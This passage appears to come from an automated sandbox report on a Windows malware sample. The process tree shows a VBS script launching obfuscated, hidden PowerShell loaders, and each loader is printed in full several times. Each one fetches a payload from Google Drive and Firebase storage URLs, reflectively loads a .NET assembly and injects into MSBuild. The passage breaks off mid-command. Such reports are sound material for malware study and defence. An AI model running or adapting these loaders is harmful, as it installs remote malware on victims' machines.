      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:5756
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:6132

C:\Windows\system32\wscript.exe
wscript.exe C:\ProgramData\carvoejar.vbs
1⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:964
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0RmxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5kSW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4888
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:1480
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5784

C:\Windows\system32\wscript.exe
wscript.exe C:\ProgramData\carvoejar.vbs
1⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:1600
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0RmxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5kSW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:2792
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:1736
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4584

C:\Windows\system32\wscript.exe
wscript.exe C:\ProgramData\carvoejar.vbs
1⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:3332
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0RmxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5kSW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:5152
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:5580
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:112

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x514 0x508
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4400

C:\Windows\system32\wscript.exe
wscript.exe C:\ProgramData\carvoejar.vbs
1⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0RmxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5kSW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:3484
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += 